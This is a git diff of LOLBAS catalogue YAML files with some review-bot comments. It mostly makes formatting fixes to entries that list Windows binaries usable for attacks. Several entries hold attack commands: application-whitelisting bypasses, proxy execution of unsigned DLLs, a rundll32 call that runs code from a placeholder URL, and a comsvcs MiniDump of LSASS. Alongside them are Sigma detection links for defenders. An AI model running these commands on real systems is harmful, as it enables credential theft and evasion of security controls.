Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows 10 @@ -31,4 +31,3 @@ Resources: Acknowledgement: - Person: Hashim Jawad Handle: '@ihack4falafel' ---- diff --git a/yml/OSBinaries/Wuauclt.yml b/yml/OSBinaries/Wuauclt.yml index c5608aa..ada37a0 100644 
--- a/yml/OSBinaries/Wuauclt.yml +++ b/yml/OSBinaries/Wuauclt.yml @@ -18,7 +18,7 @@ Code_Sample: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_wuauclt_network_connection.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/f16aca7a353bb01d9862ea1f2a10fa0d866e83c3/rules/windows/process_creation/sysmon_proxy_execution_wuauclt.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_wuauclt.yml - IOC: wuauclt run with a parameter of a DLL path - IOC: Suspicious wuauclt Internet/network connections Resources: @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: David Middlehurst Handle: '@dtmsecurity' ---- diff --git a/yml/OSBinaries/Xwizard.yml b/yml/OSBinaries/Xwizard.yml index 8c01a73..831153c 100644 --- a/yml/OSBinaries/Xwizard.yml +++ b/yml/OSBinaries/Xwizard.yml @@ -1,6 +1,6 @@ --- Name: Xwizard.exe -Description: +Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -50,4 +50,3 @@ Acknowledgement: Handle: '@harr0ey' - Person: Wade Hickey Handle: '@notwhickey' ---- diff --git a/yml/OSLibraries/Advpack.yml b/yml/OSLibraries/Advpack.yml index 5e75f3c..99909eb 100644 --- a/yml/OSLibraries/Advpack.yml +++ b/yml/OSLibraries/Advpack.yml @@ -1,7 +1,7 @@ --- Name: Advpack.dll Description: Utility for installing software and drivers with rundll32.exe -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, @@ -62,4 +62,3 @@ Acknowledgement: Handle: '@moriarty_meng' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- 
diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml
index 532c0e7..a044575 100644
--- a/yml/OSLibraries/Desk.yml
+++ b/yml/OSLibraries/Desk.yml
@@ -17,7 +17,7 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 - OperatingSystem: Windows 10, Windows 11 + OperatingSystem: Windows 10, Windows 11 Full_Path: - Path: C:\Windows\System32\desk.cpl - Path: C:\Windows\SysWOW64\desk.cpl
@@ -41,4 +41,3 @@ Acknowledgement: Handle: '@SecurePeacock' - Person: Jose Luis Sanchez Handle: '@Joseliyo_Jstnk' ----
diff --git a/yml/OSLibraries/Dfshim.yml b/yml/OSLibraries/Dfshim.yml
index 7deb471..ffec91d 100644
--- a/yml/OSLibraries/Dfshim.yml
+++ b/yml/OSLibraries/Dfshim.yml
@@ -1,29 +1,28 @@ ---- -Name: Dfshim.dll -Description: ClickOnce engine in Windows used by .NET -Author: 'Oddvar Moe' -Created: 2018-05-25 -Commands: - - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo - Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) - Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass - Privileges: User - MitreID: T1127 - OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 -Full_Path: - - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe -Code_Sample: -- Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml -Resources: - - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe -Acknowledgement: - - Person: Casey Smith - Handle: '@subtee' ---- +--- +Name: Dfshim.dll +Description: ClickOnce engine in Windows used by .NET +Author: 'Oddvar Moe' +Created: 2018-05-25 +Commands: + - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo + Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) + Usecase: Use binary to bypass Application whitelisting + Category: AWL Bypass + Privileges: User + MitreID: T1127 + OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe + - Path: 
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe + - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml +Resources: + - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf + - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe +Acknowledgement: + - Person: Casey Smith + Handle: '@subtee' diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml index 5d4b41d..0dcc668 100644 --- a/yml/OSLibraries/Ieadvpack.yml +++ b/yml/OSLibraries/Ieadvpack.yml @@ -1,7 +1,7 @@ --- Name: Ieadvpack.dll Description: INF installer for Internet Explorer. Has much of the same functionality as advpack.dll. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe ieadvpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1, @@ -31,12 +31,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 ieadvpack.dll, RegisterOCX "cmd.exe /c calc.exe" Description: Launch command line by calling the RegisterOCX function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\ieadvpack.dll - Path: c:\windows\syswow64\ieadvpack.dll @@ -57,4 +59,3 @@ Acknowledgement: Handle: '@0rbz_' - Person: Pierre-Alexandre Braeken (RegisterOCX - CMD) Handle: '@pabraeken' ---- diff --git a/yml/OSLibraries/Ieframe.yml b/yml/OSLibraries/Ieframe.yml index 7d8bc1b..2423263 100644 --- a/yml/OSLibraries/Ieframe.yml +++ b/yml/OSLibraries/Ieframe.yml 
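Review bot: `Name: Dfshim.dll` but every `Full_Path` entry in the re-emitted file points at `Dfsvc.exe`, the ClickOnce host the command trampolines into, so anyone deriving an allow/block rule or a hunting query from `Full_Path` is keyed to a different binary than the library this entry is about. The hunk reads as a line-ending normalization (every line removed and re-added, with only `AWL bypass` → `AWL Bypass` changing), so the mismatch is pre-existing, but since the whole file is rewritten here it is the natural place to fix it: put the DLL's own location first under `Full_Path` and keep the Dfsvc.exe paths as a clearly labelled secondary list, or move them into `Resources`. Separately, `- Code:` under `Code_Sample` is a bare empty value and parses as null, not as an empty string; `- Code: ''` makes the intent explicit.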
@@ -1,12 +1,12 @@ --- Name: Ieframe.dll Description: Internet Browser DLL for translating HTML code. -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url" Description: Launch an executable payload via proxy through a(n) URL (information) file by calling OpenURL. - UseCase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. + Usecase: Load an executable payload by calling a .url file with or without quotes. The .url file extension can be renamed. Category: Execute Privileges: User MitreID: T1218.011 @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@bohops' - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml index 9483c3c..b3a777f 100644 --- a/yml/OSLibraries/Mshtml.yml +++ b/yml/OSLibraries/Mshtml.yml @@ -1,7 +1,7 @@ --- Name: Mshtml.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta" @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSLibraries/Pcwutl.yml b/yml/OSLibraries/Pcwutl.yml index 1f47e38..3520e26 100644 --- a/yml/OSLibraries/Pcwutl.yml +++ b/yml/OSLibraries/Pcwutl.yml @@ -1,7 +1,7 @@ --- Name: Pcwutl.dll Description: Microsoft HTML Viewer -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe pcwutl.dll,LaunchApplication calc.exe @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- diff --git a/yml/OSLibraries/Setupapi.yml b/yml/OSLibraries/Setupapi.yml index 4295dd3..401c27b 100644 --- a/yml/OSLibraries/Setupapi.yml +++ b/yml/OSLibraries/Setupapi.yml 
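Review bot: The `UseCase` → `Usecase` key rename in the first Ieframe hunk is the right kind of consistency fix, but the same file keeps `Created: '2018-05-25'` quoted while the Mshtml and Pcwutl hunks on this same line carry `Created: 2018-05-25` unquoted; under a YAML 1.1 loader the unquoted form becomes a date object and the quoted form stays a string, so whatever schema validates these files has to accept both types or one of the two sets will fail for reasons unrelated to content. Pick one form repo-wide: `Created: '2018-05-25'` everywhere if the value is only ever displayed, or unquoted everywhere with the schema typed as a date, rather than leaving the type to the loader.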
@@ -1,19 +1,19 @@ --- Name: Setupapi.dll Description: Windows Setup Application Programming Interface -Author: +Author: LOLBAS Team Created: '2018-05-25' Commands: - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Tools\shady.inf Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (section name specified). - UseCase: Run local or remote script(let) code through INF file specification. + Usecase: Run local or remote script(let) code through INF file specification. Category: AWL Bypass Privileges: User MitreID: T1218.011 OperatingSystem: Windows - Command: rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf Description: Launch an executable file via the InstallHinfSection function and .inf file section directive. - UseCase: Load an executable payload. + Usecase: Load an executable payload. Category: Execute Privileges: User MitreID: T1218.011 @@ -43,4 +43,3 @@ Acknowledgement: Handle: '@subTee' - Person: Nick Carr (Threat Intel) Handle: '@ItsReallyNick' ---- diff --git a/yml/OSLibraries/Shdocvw.yml b/yml/OSLibraries/Shdocvw.yml index 8a8dccd..beaf96f 100644 --- a/yml/OSLibraries/Shdocvw.yml +++ b/yml/OSLibraries/Shdocvw.yml @@ -1,7 +1,7 @@ --- Name: Shdocvw.dll Description: Shell Doc Object and Control Library. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url" 
@@ -19,13 +19,12 @@ Code_Sample: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml Resources: - - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ - - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ - - Link: https://twitter.com/bohops/status/997690405092290561 - - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html + - Link: http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/ + - Link: https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/ + - Link: https://twitter.com/bohops/status/997690405092290561 + - Link: https://windows10dll.nirsoft.net/shdocvw_dll.html Acknowledgement: - Person: Adam Handle: '@hexacorn' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSLibraries/Shell32.yml b/yml/OSLibraries/Shell32.yml index 4ddf18e..302ded6 100644 --- a/yml/OSLibraries/Shell32.yml +++ b/yml/OSLibraries/Shell32.yml @@ -1,7 +1,7 @@ --- Name: Shell32.dll Description: Windows Shell Common Dll -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe shell32.dll,Control_RunDLL payload.dll @@ -17,12 +17,14 @@ Commands: Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows - Command: rundll32 SHELL32.DLL,ShellExec_RunDLL "cmd.exe" "/c echo hi" Description: Launch command line by calling the ShellExec_RunDLL function. Usecase: Run an executable payload. Category: Execute Privileges: User MitreID: T1218.011 + OperatingSystem: Windows Full_Path: - Path: c:\windows\system32\shell32.dll - Path: c:\windows\syswow64\shell32.dll 
@@ -46,4 +48,3 @@ Acknowledgement: Handle: '@mattifestation' - Person: Kyle Hanslovan (ShellExec_RunDLL) Handle: '@KyleHanslovan' ---- diff --git a/yml/OSLibraries/Syssetup.yml b/yml/OSLibraries/Syssetup.yml index 44a0bb4..a9792f2 100644 --- a/yml/OSLibraries/Syssetup.yml +++ b/yml/OSLibraries/Syssetup.yml @@ -1,7 +1,7 @@ --- Name: Syssetup.dll Description: Windows NT System Setup -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\test\shady.inf @@ -40,4 +40,3 @@ Acknowledgement: Handle: '@harr0ey' - Person: Jimmy (Scriptlet) Handle: '@bohops' ---- diff --git a/yml/OSLibraries/Url.yml b/yml/OSLibraries/Url.yml index ea34df9..a1d0a80 100644 --- a/yml/OSLibraries/Url.yml +++ b/yml/OSLibraries/Url.yml @@ -1,7 +1,7 @@ --- Name: Url.dll Description: Internet Shortcut Shell Extension DLL. -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe url.dll,OpenURL "C:\test\calc.hta" @@ -69,4 +69,3 @@ Acknowledgement: Handle: '@DissectMalware' - Person: r0lan (Obfuscation) Handle: '@r0lan' ---- diff --git a/yml/OSLibraries/Zipfldr.yml b/yml/OSLibraries/Zipfldr.yml index d64c755..0630f1c 100644 --- a/yml/OSLibraries/Zipfldr.yml +++ b/yml/OSLibraries/Zipfldr.yml @@ -1,7 +1,7 @@ --- Name: Zipfldr.dll Description: Compressed Folder library -Author: +Author: LOLBAS Team Created: 2018-05-25 Commands: - Command: rundll32.exe zipfldr.dll,RouteTheCall calc.exe @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@moriarty_meng' - Person: r0lan (Obfuscation) Handle: '@r0lan' ---- diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml index 03596cf..4eb5b2a 100644 --- a/yml/OSLibraries/comsvcs.yml +++ b/yml/OSLibraries/comsvcs.yml @@ -1,7 +1,7 @@ --- Name: Comsvcs.dll Description: COM+ Services -Author: +Author: LOLBAS Team Created: 2019-08-30 Commands: - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full" 
@@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: modexp Handle: ----
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml
index 638cea1..91b6b26 100644
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -1,25 +1,24 @@ ---- -Name: CL_LoadAssembly.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml -Resources: - - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ -Acknowledgement: - - Person: Jimmy - Handle: '@bohops' ---- +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml +Resources: + - Link: 
https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml index 08d6674..6aa4d87 100644 --- a/yml/OSScripts/CL_mutexverifiers.yml +++ b/yml/OSScripts/CL_mutexverifiers.yml @@ -1,6 +1,6 @@ --- Name: CL_Mutexverifiers.ps1 -Description: +Description: Proxy execution with CL_Mutexverifiers.ps1 Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSScripts/Cl_invocation.yml b/yml/OSScripts/Cl_invocation.yml index 6610eb1..8197863 100644 --- a/yml/OSScripts/Cl_invocation.yml +++ b/yml/OSScripts/Cl_invocation.yml @@ -28,4 +28,3 @@ Acknowledgement: Handle: '@bohops' - Person: Pierre-Alexandre Braeken Handle: '@pabraeken' ---- diff --git a/yml/OSScripts/Manage-bde.yml b/yml/OSScripts/Manage-bde.yml index edf125c..bab7431 100644 --- a/yml/OSScripts/Manage-bde.yml +++ b/yml/OSScripts/Manage-bde.yml @@ -36,4 +36,3 @@ Acknowledgement: Handle: '@danielbohannon' - Person: John Lambert Handle: '@JohnLaTwC' ---- diff --git a/yml/OSScripts/Pubprn.yml b/yml/OSScripts/Pubprn.yml index b95813a..3972a02 100644 --- a/yml/OSScripts/Pubprn.yml +++ b/yml/OSScripts/Pubprn.yml @@ -1,6 +1,6 @@ --- Name: Pubprn.vbs -Description: +Description: Proxy execution with Pubprn.vbs Author: 'Oddvar Moe' Created: 2018-05-25 Commands: @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml index fb6aa06..f9e3dd4 100644 --- a/yml/OSScripts/Syncappvpublishingserver.yml +++ b/yml/OSScripts/Syncappvpublishingserver.yml @@ -25,4 +25,3 @@ Acknowledgement: Handle: '@monoxgas' - Person: Casey Smith Handle: '@subtee' ---- 
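Review bot: The Command value re-added for CL_LoadAssembly.ps1 still opens with a typographic right double quote, `'”powershell.exe -command "set-location ...`, so the quoted command is not what a reader would actually type; the same `”` closes the Command in the UtilityFunctions.ps1 hunk further down (`...[Program.Class]::Main()”'`). Both read as word-processor artifacts that the whole-file rewrite carried over unchanged, and the fix is simply to delete the `”` in each. Since every line of this file is removed and re-added with only the trailing `---` visibly different, the rewrite presumably normalises line endings or trailing whitespace (the Fsi, FsiAnyCpu, Procdump, VisualUiaVerifyNative and Wfc hunks have the same shape); saying so in the commit message, or adding a `.gitattributes` `text=auto` rule so it cannot recur, would make the intent reviewable.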
diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml
index b4908a6..800938c 100644
--- a/yml/OSScripts/UtilityFunctions.yml
+++ b/yml/OSScripts/UtilityFunctions.yml
@@ -1,25 +1,24 @@ ---- -Name: UtilityFunctions.ps1 -Description: PowerShell Diagnostic Script -Author: Jimmy (@bohops) -Created: 2021-09-26 -Commands: - - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' - Description: Proxy execute Managed DLL with PowerShell - Usecase: Execute proxied payload with Microsoft signed binary - Category: Execute - Privileges: User - MitreID: T1216 - OperatingSystem: Windows 10 21H1 (likely other versions as well) -Full_Path: - - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 -Code_Sample: - - Code: -Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml -Resources: - - Link: https://twitter.com/nickvangilder/status/1441003666274668546 -Acknowledgement: - - Person: Nick VanGilder - Handle: '@nickvangilder' ---- +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1216 + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder 
+ Handle: '@nickvangilder' diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml index 67a1719..cdd4176 100644 --- a/yml/OSScripts/Winrm.yml +++ b/yml/OSScripts/Winrm.yml @@ -55,4 +55,3 @@ Acknowledgement: Handle: '@bohops' - Person: Red Canary Company cc Tony Lambert Handle: '@redcanaryco' ---- diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml index bc19377..78e24e0 100644 --- a/yml/OSScripts/pester.yml +++ b/yml/OSScripts/pester.yml @@ -33,5 +33,4 @@ Acknowledgement: - Person: Emin Atac Handle: '@p0w3rsh3ll' - Person: Stamatis Chatzimangou - Handle: '@_st0pp3r_' ---- + Handle: '@_st0pp3r_' diff --git a/yml/OtherMSBinaries/AccCheckConsole.yml b/yml/OtherMSBinaries/AccCheckConsole.yml index 6c21705..8c07903 100644 --- a/yml/OtherMSBinaries/AccCheckConsole.yml +++ b/yml/OtherMSBinaries/AccCheckConsole.yml @@ -34,4 +34,3 @@ Resources: Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Adplus.yml b/yml/OtherMSBinaries/Adplus.yml index da7749d..0cd6d62 100644 --- a/yml/OtherMSBinaries/Adplus.yml +++ b/yml/OtherMSBinaries/Adplus.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Agentexecutor.yml b/yml/OtherMSBinaries/Agentexecutor.yml index e082f2c..1af9f88 100644 --- a/yml/OtherMSBinaries/Agentexecutor.yml +++ b/yml/OtherMSBinaries/Agentexecutor.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Eleftherios Panos Handle: '@lefterispan' ---- diff --git a/yml/OtherMSBinaries/Appvlp.yml b/yml/OtherMSBinaries/Appvlp.yml index d8fdf6b..ad91b5f 100644 --- a/yml/OtherMSBinaries/Appvlp.yml +++ b/yml/OtherMSBinaries/Appvlp.yml @@ -44,4 +44,3 @@ Acknowledgement: Handle: '@moo_hax' - Person: Matt Wilson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Bginfo.yml b/yml/OtherMSBinaries/Bginfo.yml index 78d64cf..0d94ccf 100644 --- a/yml/OtherMSBinaries/Bginfo.yml +++ b/yml/OtherMSBinaries/Bginfo.yml 
@@ -60,4 +60,3 @@ Resources: Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 8e82023..db3adea 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -42,4 +42,3 @@ Acknowledgement: Handle: '@mrd0x' - Person: Spooky Sec Handle: '@sec_spooky' ---- diff --git a/yml/OtherMSBinaries/Coregen.yml b/yml/OtherMSBinaries/Coregen.yml index 7026e44..d92d2dc 100644 --- a/yml/OtherMSBinaries/Coregen.yml +++ b/yml/OtherMSBinaries/Coregen.yml @@ -46,4 +46,3 @@ Acknowledgement: Handle: - Person: Casey Erikson Handle: ---- diff --git a/yml/OtherMSBinaries/Csi.yml b/yml/OtherMSBinaries/Csi.yml index 7634065..abd9565 100644 --- a/yml/OtherMSBinaries/Csi.yml +++ b/yml/OtherMSBinaries/Csi.yml @@ -28,4 +28,3 @@ Resources: Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OtherMSBinaries/DefaultPack.yml b/yml/OtherMSBinaries/DefaultPack.yml index a1c22cc..dc4eab5 100644 --- a/yml/OtherMSBinaries/DefaultPack.yml +++ b/yml/OtherMSBinaries/DefaultPack.yml @@ -22,4 +22,3 @@ Resources: Acknowledgement: - Person: checkymander Handle: '@checkymander' ---- diff --git a/yml/OtherMSBinaries/Devtoolslauncher.yml b/yml/OtherMSBinaries/Devtoolslauncher.yml index dede1aa..00b82ac 100644 --- a/yml/OtherMSBinaries/Devtoolslauncher.yml +++ b/yml/OtherMSBinaries/Devtoolslauncher.yml @@ -30,4 +30,3 @@ Resources: Acknowledgement: - Person: felamos Handle: '@_felamos' ---- diff --git a/yml/OtherMSBinaries/Dnx.yml b/yml/OtherMSBinaries/Dnx.yml index ba2d22a..7957ca2 100644 --- a/yml/OtherMSBinaries/Dnx.yml +++ b/yml/OtherMSBinaries/Dnx.yml @@ -25,4 +25,3 @@ Resources: Acknowledgement: - Person: Matt Nelson Handle: '@enigma0x3' ---- diff --git a/yml/OtherMSBinaries/Dotnet.yml b/yml/OtherMSBinaries/Dotnet.yml index 2490174..b202817 100644 --- a/yml/OtherMSBinaries/Dotnet.yml +++ b/yml/OtherMSBinaries/Dotnet.yml 
@@ -6,6 +6,7 @@ Created: 2019-11-12 Commands: - Command: dotnet.exe [PATH_TO_DLL] Description: dotnet.exe will execute any dll even if applocker is enabled. + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 @@ -19,6 +20,7 @@ Commands: OperatingSystem: Windows 7 and up with .NET installed - Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ] Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code + Usecase: Execute code bypassing AWL Category: AWL Bypass Privileges: User MitreID: T1218 @@ -38,4 +40,3 @@ Acknowledgement: Handle: '@_felamos' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OtherMSBinaries/Dump64.yml b/yml/OtherMSBinaries/Dump64.yml index 4adb7c9..e4d1c6d 100644 --- a/yml/OtherMSBinaries/Dump64.yml +++ b/yml/OtherMSBinaries/Dump64.yml @@ -21,4 +21,3 @@ Resources: Acknowledgement: - Person: mr.d0x Handle: '@mrd0x' ---- diff --git a/yml/OtherMSBinaries/Dxcap.yml b/yml/OtherMSBinaries/Dxcap.yml index 6cc8b9d..cf5b56f 100644 --- a/yml/OtherMSBinaries/Dxcap.yml +++ b/yml/OtherMSBinaries/Dxcap.yml @@ -23,4 +23,3 @@ Resources: Acknowledgement: - Person: Matt harr0ey Handle: '@harr0ey' ---- diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml index a12816b..0dc1354 100644 --- a/yml/OtherMSBinaries/Excel.yml +++ b/yml/OtherMSBinaries/Excel.yml @@ -38,4 +38,3 @@ Resources: Acknowledgement: - Person: 'Reegun J (OCBC Bank)' Handle: '@reegun21' ---- diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml index 2adf80a..fe18464 100644 --- a/yml/OtherMSBinaries/Fsi.yml +++ b/yml/OtherMSBinaries/Fsi.yml 
